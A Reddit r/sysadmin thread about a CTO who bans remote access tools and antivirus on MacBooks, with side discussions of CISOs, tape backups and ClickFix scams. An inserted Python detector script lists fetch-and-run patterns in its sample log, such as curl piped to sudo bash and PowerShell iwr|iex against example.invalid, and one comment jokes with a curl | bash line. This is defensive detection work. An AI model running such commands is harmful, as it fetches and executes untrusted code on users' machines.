CTO banned the use of remote access tool
Posted by uw4yn3@reddit | sysadmin | 418 comments
Hi everyone, how’s it going?
I’d love to get your perspective on this situation:
I’m the sole guy responsible for IT operations and infrastructure for my country at the company where I work. The company was recently "sold"/migrated to another group within the same conglomerate. I used to report to a highly structured global IT team (80% cloud, very mature processes), but with this transition, an entirely new leadership team took over. The new CTO recently came here to establish the new headquarters in another city.
We are currently in a transition phase, still using a few things from the old infrastructure (Entra ID, Intune, and... our remote access tool). However, the IT team from the old group won't allow us to add any new machines to this access tool during the migration. To make things more interesting, the CTO’s first big mandate upon arriving here was: replace everyone's laptops.
Realizing that I would completely lose the ability to support these new machines, I asked the CTO which global remote access solution they use so I could migrate the machines, or if we should procure a standalone solution just for my country. His answer: "We don't need any."
I didn't understand and pressed the matter. I explained that we operate on a hybrid model, users are scattered, and now that the new HQ is active, I’m being flooded with support tickets from people in another city with these new laptops, where I have zero visibility. He insisted: "No need. You can just guide the user over a video call. It is a global decision not to use remote access tools."
Since he is the CTO and we speak in English with each other (which is not the native language for either of us), I decided not to keep bumping heads.
But the tickets keep coming. Trying to troubleshoot blindly is an absolute hell. Out of desperation, I did my homework: I gathered a few local quotes from standard market remote access tool vendors and presented the pricing to him, showing how users were reaching out to me and why we needed this. He replied again: "We are not going to use remote access."
I simply gave up. I'm not going to keep bumping heads with the CTO. It’s clearly not a budget issue, it feels more like a rigid and inflexible mindset. He never gave me the real "why" behind this rule. At first, I thought maybe it was some extreme, distorted Zero Trust policy or user data privacy thing. But then, a few days later, I asked this same CTO which corporate antivirus solution we were going to deploy, since we are going to stop using the one from the previous group. His response: "We don't need antivirus because we use MacBooks."
At that point, my friends, I decided to just "let it go" and strictly follow his orders. I brought the issues to the highest technical authority in my sector, and he refused to act. If a key user has to spend 4 hours on a video call with me trying to fix a stupid issue that I could solve in 30 seconds via terminal, so be it.
Has anyone here ever dealt with such an inflexible leadership? I’d love to hear your thoughts on this "behavior", your experiences, and what kind of workarounds you’ve used in similar situations.
Thanks!
DenyCasio@reddit
I physically recoiled at "We don't need antivirus because we use MacBooks."
That CTO is the reason CISO role exists.
Just roll with it and either look or tough it out. Idiots will be idiots.
sabre31@reddit
Except CISO are more dumber than CTO in many cases. You can’t win either way.
5redie8@reddit
Our old CTO fought my colleague when they were asked to reboot their Mac as part of basic troubleshooting because they "know FreeBSD and you don't have to reboot these OSes".
These are the people spearheading AI initiatives worldwide BTW.
deepasleep@reddit
Well the AI is going to be smarter than these people.
Narcotras@reddit
If they even listen to it, sadly
Sapper12D@reddit
They forgot that they were already the stupidest ones on the totem pole.
TaxHazyShade@reddit
... just ... wow. Wow.
elitexero@reddit
Makes sense given that fuckpunching AI into every nook and cranny makes absolutely 0 sense in 99% of cases.
5redie8@reddit
Correct. Penn State also introduced an AI major and attached it to an MBA to give you a further idea of the level of executive masturbation we're at by this point.
This is the wet dream execs have had for years where they have a machine that will prove anyone wrong and let them get rid of all the pesky tech people that make their job harder
brianozm@reddit
We just need our first few major public AI disasters to help get things on a more rational footing.
w1ten1te@reddit
I think we've already had them, but these companies aren't owning up to it. Many of the CVEs and outages lately are probably caused by know-nothing "prompt engineers" vibe coding features. There's just no incentive for the tech companies to own up to it.
GoogleDrummer@reddit
Well yeah. People with MBAs made that decision.
Ferretau@reddit
That explains why they stop working after a few prompts - they go insane. Fits perfectly for the type of people that are excited by this tech as it currently stands.
Ferretau@reddit
Try telling that to M$
sybrwookie@reddit
I have never encountered a CISO who has an ounce of use. Every single one tries to overban things, then gets his legs chopped out after messing up the business, and then has no teeth to enforce anything.
Cheomesh@reddit
Do tell - I haven't dealt with any directly for actual security stuff, and I'm angling my career in that direction, so I'm all ears on how NOT to be that kind of CISO.
Just_Information334@reddit
A new classic: https://crankysec.com/blog/shite/
Leather-Arachnid-417@reddit
I lived the life of the person that wrote this and I'll never do it again. People don't want the direct truth. They want robots that do exactly what they say without question and someone to blame when they fuck it up.
Cheomesh@reddit
Hah love it; thankfully mine have never been remotely like that!
Though, it does make it sound like I should have pushed harder to work for Deloitte, hah.
lurking_bishop@reddit
In my life experience, a CISO understands their job description as "lock down everything, don't provide alternatives and disregard power users in particular"
It's especially helpful if the CISO doesn't come from a coding background and hasn't followed the tech / open source scene in decades, because then he'll staunchly defend his restrictions as reasonable, after all he can do his work no problem
bobsbitchtitz@reddit
It's CYA for a CISO to say "disregard end users". As long as there is a user you'll have an attack vector. I've only been at one company that had super tight restrictions but found a way for eng to still get their job done.
aitorbk@reddit
We can still do our jobs. But a 3 hour task can take two weeks. And be frustrating.
Can we do the job? Yes. Is the client happy if time constrained? No.
So while we can do the job, the restrictions make it not fit for purpose.
Justin_Passing_7465@reddit
Are the policies "maximizing shareholder value"?
Ferretau@reddit
The cost is no longer visible to them - so there are probably execs that are going to get a fat bonus over it.
aitorbk@reddit
Correct. The solution is to minimise risk and costs.
Risk with these Draconian measures, and cost... well, other people, and by changing cost centers.
Cheomesh@reddit
Seems like a crappy way to CYA. My background thus far would suggest that I should document a lot of stuff, and if there's of some type we can't close, figure out how we're mitigating potential vulnerabilities, describing them as false or misleading findings, and perhaps if it is a real issue that we can't readily mitigate open a dialogue on how to migrate away from .
Is that the more proper route?
bobsbitchtitz@reddit
Depends on how your leadership handles sec incidents. If c suite is mostly non technical they’ll just say wtf do we have you for if they’re smart they’ll help you balance productivity vs security.
lurking_bishop@reddit
I like to compare company infosec with an immune system.
No immune system -> organism quickly dies
Too aggressive immune system -> organism eats itself and/or loses fitness due to inordinate energy expenditure/exhaustion
A good immune system lies dormant and monitors ingress points until it's alerted. It doesn't prevent the organism from eating shit, but it will quickly spring into action to control the damage.
Centimane@reddit
Completely disagree.
CISO understand their job description as "forward some out-of-context snippets of the report a tool spat out". Hell, I wouldn't be surprised if a CISO sent me a critical security finding for:
anxiousinfotech@reddit
Thankfully ours doesn't do that, but I hear from colleagues regularly about things like 'critical Windows service vulnerability detected on'. Some scanning utility spits it out and no one on the security team has the brains to know that the finding is actually impossible.
Speeddymon@reddit
WSL?
anxiousinfotech@reddit
Not situations where that's in use, nor VMs, or container services. Full fat Linux VM with screaming about a Windows-only service that simply does not exist.
I believe they all use Rapid7 for their vulnerability scanning. I remember piloting it once years ago and the false positives were insane. I mean, it found everything but just like AI it made up a bunch more while it was at it...
Speeddymon@reddit
That reminds me of a false positive from them that I dealt with 9 years ago. The org I was working for at the time was doing vulnerability scanning against their iDRAC Web interfaces and one single device kept getting intermittently flagged for something it couldn't even do. Never did figure out how to get it to stop being flagged until the device was decommissioned.
agent-squirrel@reddit
Nexpose? We have that issue too.
agent-squirrel@reddit
Not even, we had a report from our c-sec team: "Vulnerable NFS server version please patch". The CVE was for Windows NFS server and this was a Linux machine...
Cheomesh@reddit
Mmm, been a minute since I've looked at Linux. That finding, which I already understand to be a non-issue, is just that the tool was looking for a shell script called scanning-tool, failed to find it, and gave you a heads up.
Critical's definitely out of the question, but were I dropped into that position tomorrow morning and found that I would probably forward it to you with the question "Should there be scanning-tool.sh, and if so, any idea why it might have gone missing?"
Would that be the correct way to handle it?
agent-squirrel@reddit
I think they were riffing on the fact that the CISO wouldn't actually know what that error meant and saw it as a vulnerability.
Cheomesh@reddit
Yeah, I was trying to make sure I was following (I wasn't)
Centimane@reddit
The joke is: I wouldn't be surprised if the CISO couldn't find the scanning tool on their own machine, and blindly forward the error as a vulnerability.
Cheomesh@reddit
Oh, I didn't pick up on it being their own machine, lol
agent-squirrel@reddit
"Nexpose said..."
"Openvas said..."
Fuck off.
spacelama@reddit
Heh. My old company was in a (constant) state of reorganisation^Wreimagination and I was slowly outgoing from the central linux group, but got a request to install some dodgy security scanner with a slick marketing page and no technical details onto all of our DMZ machines including the 16 webservers. I pushed back, and asked for things such as "how much spool space is expected, what egress does it need to get the results sent back to whatever it's sending to? You know it installs its own kernel modules right - what's the process during patching? Is there a compatibility matrix? What's the support procedure? What even is the timeline of this urgent request - why have I been requested to push directly to prod DMZ and some of our most sensitive machines first, without being allowed to test on dev machines beforehand?" etc. Of course, I got no answers. So a few weeks later, still getting system alerts but no further involvement in that group, I notice 1 by 1 over the course of about half an hour, the 16 webservers falling over with a full /var because, duh, no one had put a firewall request in. They got some other lackey who they knew wouldn't question anything to install it on everything all at once, tainted kernel and all. But of course no one questioned why a bunch of webservers that had a baseline load of 5000 reqs/sec had not sent one single byte of information back to the security monitoring system.
Gadgetman_1@reddit
I have a couple of very old tickets hanging in the system, where someone has requested setting up a box to control something and talk to a server on the internet. They're hanging because I still haven't gotten any info on firewall settings, or whether or not any computers on our 'office LAN' need to be able to speak to those boxes also.
I don't care if it's a solar panel controller, alarm system or a freakin' 'smart vending machine'. No documentation means the guys in network ops can't do their job, and MY job is to make certain Networks get ALL the info they need to do their job.
UntrustedProcess@reddit
It's the office of "No!"
anomalous_cowherd@reddit
"If the CISO is doing their job, you can't do yours."
Any easing up on that is forced on them by requiring the business to function well enough. It's up to others at the same or higher level to make that happen, with advice from people below them on the impact of the actual issues.
spacelama@reddit
All sysadmins, software engineers and cloud folk just operate in Excel and One Drive, don't they? Just sharepoint all the things!
Electrical-Staff0305@reddit
As someone in the embedded/OT cybersecurity world, that is a nightmare scenario to deal with.
And yet, I can see it happening.
Cheomesh@reddit
Oh, yeah, I'm already not like that - thankfully.
Usually if something talks about lock down, I'll look at immediate impacts to the team and if it does cause something, try and figure out if a mitigation, work around, or alternative is viable before actually putting on the clamps.
Occasionally, though, clamps need done.
Competitive_Smoke948@reddit
I have some sysadmin experience. There are several CISO types:
1 - ex-sysadmins who trust the SME & are there to work together & compromise where needed
2 - non-technical CISOs with excellent governance experience who work with the SME & come to a compromise
3 - the ex-techie / knows enough to be dangerous and who wants to look clever - fucking nightmare
4 - the non-technical CISO who thinks they know everything to look clever & are a pain
ninjatoothpick@reddit
There's also the CISO that used to work in an admin role and knows how to hire the right people to do the right job without conflict. They're also an overall SME in their own right.
It's great to work with one of these, there's mutual trust and they're available to contribute their experience to the conversation.
Competitive_Smoke948@reddit
I agree, but the CISO should ideally not be touching anything, it's a senior position, not a "hands on manager", or shouldn't be. I'm doing architecture stuff & the lengths I have to go to sometimes to stop people giving me the keys to the kingdom....
Cheomesh@reddit
Understood hah
AdmRL_@reddit
It's not about the intelligence of the person in the role, it's about KPIs and stuff. Obviously your mileage will vary from company to company, as some companies have dog shit performance systems and pander to execs regardless, but assuming you don't have a wider problem in the business then a CISO is 1000x better a reporting line for IT & Ops than a CTO.
CTOs by and large are going to be measured on products, on dev work and deliverables. Unless the company has recognised the oddity that is IT reporting to a CTO and specifically catered the CTO role to it, then their objectives will have absolutely nothing to do with what IT does. The biggest problem is a CTO reporting line typically comes from ignorance at board level: IT has no representation so they decide to give them it, they have a CEO, CFO, COO & a CTO - they see "Information & Technology" and just assume CTO is the best fit.
CISO has its own problems in terms of conflict of interest between Ops and security, and funnily enough the remote access conflict can still occur as CISOs sometimes hate it on security grounds, but at the very least their own KPIs and objectives are going to broadly fit with IT as a function and you won't hit these sitcom-level stupid decisions like OP has described. Inversely as well, if you have a CTO & CISO and IT ends up under the CISO, it at least signals the business understands IT and Dev should not cross-pollinate at that level.
I went through similar to OP with a CTO reporting line and after that I'm pretty much set on my order of preference being:
CIO > COO > CFO > CEO > CISO > CRO > CMO > The cafeteria manager > no management line at all >>> CTO
teh_chaosjester@reddit
I had to argue with my CISO that while annoying, tapes are part of a robust and valid backup and DR plan. He just said "go cloud"... So ya, CISO not always an essential position...
FuckinHighGuy@reddit
Tape backups need to die a horrible fiery death.
Loud-Diamond-540@reddit
Tape back ups are fine, unless you need to restore them
agent-squirrel@reddit
I'm genuinely curious why?
We are a research institution that has to store research data in the petabytes for long long periods of time and so far it seems the only thing that makes viable sense is tape. Is there another option bar spending squillions we don't have on cloud storage?
iheartrms@reddit
I miss tape. I never had greater confidence in being able to restore than when we had tape and rotated a backup off site. It made the 3-2-1 rule easier to implement.
Lachiexyz@reddit
That's not at all true. Tapes are still cheap per TB to store large volumes of archive data for long periods of time. Recovery speed and cost is also far lower than pulling from glacier.
Tape technology is also still evolving. LTO-10 came out last year, and there's already plans for the next few iterations.
Tape is going nowhere.
FuckinHighGuy@reddit
Did I say it was going nowhere? No. It just needs to die.
Lachiexyz@reddit
It doesn't though. It's a perfectly adequate archival media. It's also secure. It's airgapped as soon as it's ejected from the drive, and if you use WORM media, you also have immutability out of the box as well.
I'm failing to see the downside?
FuckinHighGuy@reddit
You have your opinions, I have mine.
Have a great evening.
JLee50@reddit
What do you think Glacier Deep Archive is?
FuckinHighGuy@reddit
Backup solution for poor companies.
JLee50@reddit
Or media heavy companies. Tape is still king for petabyte scale video archive.
altodor@reddit
Backup solution for companies that want cheap storage and then pray they don't need to mortgage the company to download them.
FuckinHighGuy@reddit
This!
teh_chaosjester@reddit
I don't disagree, but as part of a good 3-2-1 plan, unfortunately they still have their place :(
Designer_Solid4271@reddit
CISOs aren’t happy until no one has access to anything. Because by the very nature of having access the system is unsecured in their books.
creenis_blinkum@reddit
>more dumber
great going chap
BananaSacks@reddit
You do realize that not everyone here is 'Murrican, right?
nlfn@reddit
The beautiful thing about language is that sometimes breaking the rules can really emphasize your point. Only the most smartest people get it though.
Sanchez_87_@reddit
What you've just said is one of the most insanely idiotic things I have ever heard. At no point in your rambling, incoherent response were you even close to anything that could be considered a rational thought. Everyone in this room is now dumber for having listened to it. I award you no points, and may God have mercy on your soul.
FuckinHighGuy@reddit
100% agreed.
vivnsam@reddit
That's all you need to hear to know the CTO is in over his head.
Pussy_handz@reddit
I've never heard of a major corporation standardizing on MacBooks, that's lunacy.
Horsemeatburger@reddit
Well, there's that small outfit named IBM which 10 years ago introduced their Mac@IBM program where employees could choose which platform they wanted, and apparently over 73% went to Macs.
OK, maybe it's not such a small outfit, they quickly amassed a fleet of well over 200,000 Apple devices after introducing the program.
Last I heard, the percentage of users ever calling their IT helpdesk was 5% for Mac users vs 40% for Windows users. Apparently they saved between $270 to $543 per user over a 4-year period compared to Windows PCs, despite the higher upfront hardware cost of a Mac, which was the case when they were still intel based (nowadays Mac laptops cost around the same as a same class Windows business laptop).
Standardizing on MacBooks isn't lunacy.
What's lunacy is sticking with Windows and the rest of the Microsoft ecosystem, the platform which has the by far highest TCO, coming from a vendor who doesn't really do quality control or security.
MyWifesBoyfriend_@reddit
Big tech and all of the bay area/silicon valley uses MacBooks
AlexisFR@reddit
Who do they think they are? Marketing Artists?
zbignew@reddit
Software developers?
le_fuzz@reddit
There’s a small hardware company in Cupertino California called “Apple Inc” that standardized on MacBooks. No antivirus installed and users have full admin.
wild-whorses@reddit
Think of all the money they save not having to buy AV/EDR licenses.
_Gobulcoque@reddit
Either this guy is the turd in the pool, or I've had a string of intelligent CTOs over the decades.
It has to be the former, surely?
ISkyWarrior@reddit
Well, just like Defender is built-in on Windows, XProtect is built-in on macOS. So that could be the logic the CTO is going with. Not sure if Apple Business Manager allows the same kind of management as the M365 portals though for management of it (not sure if it can even be managed at all).
GistfulThinking@reddit
I audited 600 Macs and 600 Windows PCs back in 2012.
The windows units all had 2 to 5 viruses or flagged items each.
By comparison, maybe 30% of the Mac fleet had been flagged, but for those 30% the rate was 60+ flags each.
Wide vs Deep is often not considered..
That said, 99% of all had been automatically cleaned up.
AV stayed, performance be damned.
nokstar@reddit
EACH?
Sounds to me like someone got infected and no ZT protocols in place (if any AV was actually utilized) just spread like wildfire.
Or you’re full of it.
1esproc@reddit
Press X for Doubt
Leather_Secretary_13@reddit
It's possible he's just not telling OP about it.
Careless-Age-4290@reddit
I've seen so many idiots move through those types of positions while seemingly hiding that they're an idiot from everyone but the people under them. They always proclaim some emergency trying to unite everyone under them, offer these insane takes as if they were a thought leader trying to say bold things on LinkedIn, and they always get super angry when anyone pushes back. People make it work in spite of them, and then eventually something happens and they just disappear and you find out they colossally fucked up something while making a ton of enemies.
I'd be at a loss except they seem to come with large organizational changes that I always wonder if they're being played as the stooge themselves who are used to force a change, blame them, fire them, keep the change.
doktormane@reddit
Are you using E5 licenses? Microsoft will be including the Intune Suite in that, which comes with RemoteHelp.
bdam55@reddit
Remote Help will end up in E3.
gwildor@reddit
Quick Assist is included free with Windows 11.
Apple offers a similar solution, also included.
BrentNewland@reddit
Quick Assist doesn't allow admin escalation. Besides, original post says they're switching to Macbooks.
TYGRDez@reddit
Does QA still black out the screen when UAC prompts come up?
I found it pretty much unusable because of that.
gwildor@reddit
I believe it does - but OP said he can fix it in 4 hours via a video call, so that implied to me he can fix it with user credentials, and the user he is on the phone with can click allow for him.
RBeck@reddit
And it's surprisingly good.
JonnyLay@reddit
I just learned windows+ctrl+q today.
Windows doing something good...
Shazam1269@reddit
Can you pass admin credentials over QA? Been a while since I've used it.
Thrizzlepizzle123123@reddit
Well, damn. That might be one of the more valuable things I've learned on reddit.
KimJongUnceUnce@reddit
Remote help is pretty garbage too. It's barely any more capable than a screen share over teams.
No_Appearance2090@reddit
Remote Help at least lets you do some basic elevate privileges and type in admin passwords. Quick Assist doesn't.
SDS_PAGE@reddit
We don’t need Microsoft as we have MacBooks!!
Substantial-Fruit447@reddit
Yeah, but not until July 1st at the earliest, and there's nothing that will say it will be globally available (unless I missed it)
RevengyAH@reddit
The CTO is either an idiot, or… he’s been told to cut costs severely.
Neither bodes well for your employment… recommend jumping ship :)
gwildor@reddit
Don't blame them. If the user is in front of the PC they need help with - then you don't need a paid-for unattended access tool.
Quick Assist on Windows. Remote access on Apple. A screen share with remote control on Teams or Google Meet.
I could be remoted into your PC in less time than it took to write this post, for free. without violating any of the constraints laid out by the CTO in the post.
RevengyAH@reddit
Are you the CTO lmfao?!
Shall you tell us why we shouldn’t blame them for the no EDR/XDR?
gwildor@reddit
Nah, that's dumb... but "I either use this one legacy tool, or no tool at all" is a terrible mindset.
An extremist being upset at an extremist is silly.
NotAnOwl_@reddit
"Don't blame them. If the user is in front of the PC they need help with - then you don't need a paid-for unattended access tool."
One of the most frustrating things I still have to explain is how to use the reset emergency PIN, and I swear some users are freaking blind; half the time they don't even know the terminology used to navigate (tabs, context menu, etc.). Some descriptions I get on the daily: "the thing next to the other thing that does that stuff".
You have one valid point... paying a premium only for unattended is a luxury; I could get behind that. However, I feel the CTO is against ALL remote access, and I sincerely think he would not accept a free tool, and I would be worried about not following a policy for my personal morality.
I would consider myself being so stupid working harder for less result; this isn't the way.
gwildor@reddit
The only constraint OP informed us of is 'no new deployments on the existing tool'.
I'm also 98.6% sure that "video call" actually means "screen share via Teams" (or similar) where you can request remote control from a screen share, versus the 'video call on my cell phone' that OP assumed.
NotAnOwl_@reddit
Video call to me meant "FaceTime". If via Teams, more performant tools are available, but yeah, I could live with it.
But "backstage" access was new to me 5-6 years ago, and I wouldn't want to go back to before that.
gwildor@reddit
OP spent time explaining to us the language barrier. I inferred and applied my experience with similar communication disconnect events.
Inferring a bit more - good chance they are either a 365 or a GSuite shop, regularly using the chat features... call = Teams call, video = screen share.
In other words - to the CTO, an obvious solution that they already have.
forlornhope22@reddit
oh yeah. Definitely teach users to enable remote desktop sharing. there's no security issue there.
gwildor@reddit
I see you are unfamiliar with the solutions.
warpedgeoid@reddit
I mean, almost all endpoint security products are scams, so I understand that part.
Substantial-Fruit447@reddit
Get it in writing that he either:
1) does not want to use the existing remote access tool
2) does not want to use ANY remote access tool, even a new one
Or both.
Then, when people start complaining to the CEO you can say "Well, the CTO said no remote access, so we can't help anyone."
DizzyAmphibian309@reddit
Lol I'm not sure why you think that OP, a lowly sysadmin, is ever going to be sitting in front of a CEO, pulling up his emails to pin the blame for a bad helpdesk experience on the CTO. Like what kind of fantasy is this? Do you live in Middle Earth with the Hobbits?
If people start complaining, it's going to be to the CTO, not the CEO, and that's where the escalations will stop. The CTO will refuse to admit it's a remote access problem and will just fire OP for providing bad service. That's the reality of the situation.
OP, I suggest you touch up your resume and start applying for new jobs. Your drop in performance is not going to be blamed on the CTO. It doesn't matter what your emails say, it's going to be blamed on you. Credit rolls uphill, shit rolls downhill. You're downhill.
Xattle@reddit
Depending on what position OP has and what data they deal with, there might be personal liability for negligence. Might not save the job but might help in a court if it comes to it.
r3rg54@reddit
When has this ever happened?
Substantial-Fruit447@reddit
Lmfao.
My last CTO got axed because they were insufferable.
Some of us in IT got thrown under the bus and ended up having to sit in front of HR and defend ourselves because of stupid policies or decisions that our CTO had made.
I don't know how large of an org you've worked with or currently work for, but in my case we are a multinational manufacturing company. People will complain to their direct supervisor, who takes it to their manager, who takes it to the Director of Manufacturing, who then takes it to the VP of Production, who then complains to the COO that the IT department is creating barriers to producing money.
The COO then goes to the CEO and says "You need to talk to the CTO and straighten this out."
The CTO will either 1) do nothing 2) find scapegoats and try to make excuses, or 3) rarely, admit their mistakes and correct it.
All we had to do was put all of their departmental emails out in front of HR and the CEO to say "We tried to advocate against these decisions because we knew they would affect our frontline operations and our customer experience."
CTO was gone the next day.
DizzyAmphibian309@reddit
That's pretty rare in my experience. The COO skipping the part where he talks to the CTO before escalating to the CEO is very weird. I'd wager the COO talked to the CTO, found him to be unresponsive, and was forced to escalate. I just can't fathom a situation where escalation would go all the way up to the CEO before anyone attempted mediation laterally.
In my organization, which has tens of thousands of Corp employees, no disputes ever escalate past the VP level, which is usually about 3 levels below the CEO. Two VPs going to their SVP saying they can't come to an agreement doesn't reflect well on them. And I'm not talking some remote access tool, I'm talking "which of us gets to own this project that is expected to bring in $5B in revenue within the next 10 years" arguments.
HenrikWL@reddit
So, your organization is basically bisected, with the C-level managing some imagined organization while the actual operations are entirely handled by the VP level? That's … certainly a strategy.
Substantial-Fruit447@reddit
CYA, always.
Cover. Your. Ass.
The company is not coming to save you; they won't. You need to do it yourself.
r3rg54@reddit
Why would you ever need that in writing?
Substantial-Fruit447@reddit
For when user/customer support falls apart and they come looking for someone to fire?
Is it really that hard to fathom?
r3rg54@reddit
Yes. OP almost invariably still gets fired in this situation, and might be fired when asking for it in writing. Why OP is even talking directly to the CTO is kind of amazing in itself unless this is a really small company with inflated titles.
Shazam1269@reddit
Right? If it's not documented, it didn't happen. Your word against a C suite? Yeah, you're going to have a bad time.
ElectroSpore@reddit
Who needs exploits when you can trick Windows, Mac or Linux users into copying shell commands into the console.
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
https://www.microsoft.com/en-us/security/blog/2026/05/06/clickfix-campaign-uses-fake-macos-utilities-lures-deliver-infostealers/
mysticalfruit@reddit
PPP: People, Policies, Procedures.
You can have the best security in the world, but if your users are willing to curl a random website into a sudo command, you're fucked.
boli99@reddit
there are too many new packages resorting to 'curl pipe bash' as an accepted install method these days.
cas13f@reddit
Linux evangelists making fun of windows clickfix victims in the consumer subs get REALLY upset when you point that out.
Just_Information334@reddit
The security first language, Rust: https://rust-lang.org/tools/install/
Windows Subsystem for Linux
If you’re a Windows Subsystem for Linux user run the following in your terminal, then follow the on-screen instructions to install Rust.
Privacy_is_forbidden@reddit
CrowdStrike has blocked this for us when a user did it.
He mentioned nothing. We saw the detections after he tried running the commands. We network isolated, then took his laptop and he couldn't imagine what he did that might have warranted the response, it was unbelievable. Only after I found the details of what happened and I spelled out the scenario step by step did he suddenly remember "oh yeah, I copied and pasted this random command a website told me to run about a dozen times"
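The comments above describe the ClickFix shape (a user pasting a "fix" from a web page into a terminal, then EDR catching it after the fact). The following is an added example, not from this thread or from any vendor: a small heuristic scanner that runs over process-creation style log lines and flags the command shapes discussed here (curl/wget piped into a shell, PowerShell download cradles and encoded commands, mshta fetching a remote script). The log format, every sample line, and the `example.invalid` URLs are constructed for this example.

```python
"""Heuristic detector for ClickFix-style "paste this into your terminal" commands.

Added example, not from the thread or any vendor. It scans process command lines
(as an EDR or Sysmon-style process-creation log records them) for the shapes the
comments above describe. The log format and all sample lines are constructed;
example.invalid is a reserved, non-resolving domain.
"""
import re
from dataclasses import dataclass

# (rule name, pattern). Patterns are deliberately loose: this is triage, not proof.
RULES = [
    ("curl_or_wget_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I)),
    ("base64_decoded_into_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I)),
    ("sudo_with_remote_fetch",  # e.g. sudo sh -c "$(curl https://...)"
     re.compile(r"\bsudo\b.*\b(curl|wget)\b.*https?://", re.I)),
    ("powershell_download_cradle",
     re.compile(r"\b(iwr|invoke-webrequest|invoke-expression|iex|downloadstring|net\.webclient)\b", re.I)),
    ("powershell_encoded_command",  # -enc followed by a long base64 blob
     re.compile(r"(?<!\S)-(e|ec|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta_remote_script",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
]

# Parents that mean the command came straight from a GUI shell or browser
# (the Run-dialog / explorer.exe ClickFix shape) rather than from a dev's tooling.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "safari", "finder"}

# Constructed sample log: space-separated key=value pairs, 'cmd=' last.
SAMPLE_LOG = [
    r"ts=2024-06-01T10:02:11Z host=LAPTOP-01 user=alice parent=explorer.exe cmd=powershell.exe -w hidden -c iwr https://example.invalid/fix.ps1 | iex",
    r"ts=2024-06-01T10:03:40Z host=MBP-07 user=bob parent=Terminal cmd=curl -fsSL https://example.invalid/fix.sh | sudo bash",
    r"ts=2024-06-01T10:05:02Z host=LAPTOP-02 user=carol parent=explorer.exe cmd=notepad.exe C:\Users\carol\notes.txt",
    r"ts=2024-06-01T10:06:15Z host=DEV-03 user=dave parent=bash cmd=git pull --rebase",
    r"ts=2024-06-01T10:07:30Z host=LAPTOP-01 user=alice parent=explorer.exe cmd=mshta.exe https://example.invalid/verify.hta",
    r"ts=2024-06-01T10:08:00Z host=DEV-03 user=dave parent=bash cmd=echo aGVsbG8gd29ybGQK | base64 -d | bash",
    # Download-then-read is the safe workflow; it must NOT be flagged.
    r"ts=2024-06-01T10:09:00Z host=DEV-03 user=dave parent=bash cmd=curl -sSL https://sh.rustup.rs -o rustup.sh && less rustup.sh",
    r'ts=2024-06-01T10:10:00Z host=MBP-07 user=bob parent=zsh cmd=sudo sh -c "$(curl -fsSL https://example.invalid/install.sh)"',
]


@dataclass
class Finding:
    line_no: int
    user: str
    parent: str
    cmd: str
    rules: list
    severity: str


def parse_line(line: str) -> dict:
    """Constructed format: key=value pairs; the value of 'cmd=' is the rest of the line."""
    head, _, cmd = line.partition(" cmd=")
    fields = dict(tok.split("=", 1) for tok in head.split() if "=" in tok)
    fields["cmd"] = cmd
    return fields


def match_rules(cmd: str) -> list:
    """Names of every rule the command line triggers, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan(log_lines) -> list:
    """One Finding per suspicious line; severity is raised when a GUI shell/browser spawned it."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        f = parse_line(line)
        hits = match_rules(f["cmd"])
        if not hits:
            continue
        sev = "high" if f.get("parent", "").lower() in INTERACTIVE_PARENTS else "medium"
        findings.append(Finding(n, f.get("user", "?"), f.get("parent", "?"), f["cmd"], hits, sev))
    return findings


if __name__ == "__main__":
    for fd in scan(SAMPLE_LOG):
        print(f"[{fd.severity}] line {fd.line_no} user={fd.user} parent={fd.parent}: {', '.join(fd.rules)}")
        print(f"    {fd.cmd}")
```

The rules are intentionally coarse; a real EDR pairs this with parent-process lineage and network telemetry, which is the kind of context the CrowdStrike detection above would have had.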
ASentientRailgun@reddit
We've had a user try this. It was flagged and stopped, but Jesus.
People won't read an error message to tell me what it said, but they'll open a terminal window for some random website popup? I'll never understand people.
NEU_Throwaway1@reddit
Right? If I'm on a call with a user and the meeting is for "Install Google Chrome", they will stop and ask me on every dialogue box "It's asking me to press yes if I want to install Google Chrome."
Meanwhile if they get a pop-up that says to call a random 1-800 number or execute a script, suddenly they're experts in reading comprehension.
boli99@reddit
it's because they aren't thinking how to answer the question
they are thinking 'how can I interpret this question in order to get a break from work'
Visitor_X@reddit
I was once helping someone to connect to the (then new) corporate SSL-VPN. They had received instructions via email and claimed over the phone to be following them but still no luck. I couldn't see connection attempts so I asked them to follow the procedure once again and listened to what they were doing. So... when the installer pop-up came asking if you want to install, he rapidly clicked NO and explained to me that there is a standing order not to click "OK", "Allow" etc. on any random pop-ups that come up from web pages...
I think my forehead is still a bit caved in from the facepalm I did and it's been over 15 years already.
wanderinggoat@reddit
what is it with error messages that people refuse to read them or start saying blah blah when it comes to the critical part? I always wonder if they are trying to avoid getting the problem fixed.
Background_Lemon_981@reddit
Which is why you need to restrict ordinary users from using the console. Who doesn’t do this?
agent-squirrel@reddit
curl -s https://gingerrights.com/wicked_script_make_computer_fast.sh | bash
196430754829@reddit
You wanna hear the wildest social engineer I encountered in the wild?
Customer placed a ticket "got a virus". Cool - standard stuff. Well... she was trying to get to LinkedIn. Googled it and clicked the first thing she saw - SOMEHOW, they convinced her the way to get into LinkedIn was to run a bash command which then downloaded a macro…..
like how many times in your life have you ever opened a terminal to get into a web page…
perkia@reddit
I'm running QubesOS, this is clearly a trick question. Right?
CarnageAsada-@reddit
People are complete idiots if they fall for this 😂
ElectroSpore@reddit
In every company there are a bunch of them.
ratmouthlives@reddit
This is precisely why I follow this sub. For people like you to come with the links so I can then in turn try to scare straight my higher ups into letting me implement proper security standards.
andrewsmd87@reddit
I have all of the C suite sufficiently scared of ISO and cyber insurance. It's a godsend when I just need something approved
Mrhiddenlotus@reddit
It's crazy the things execs will do when you say the words "compliance" and "cyber insurance".
Hapless_Wizard@reddit
Best conversation I ever had with an SMB money guy was after him denying the purchase of a firewall.
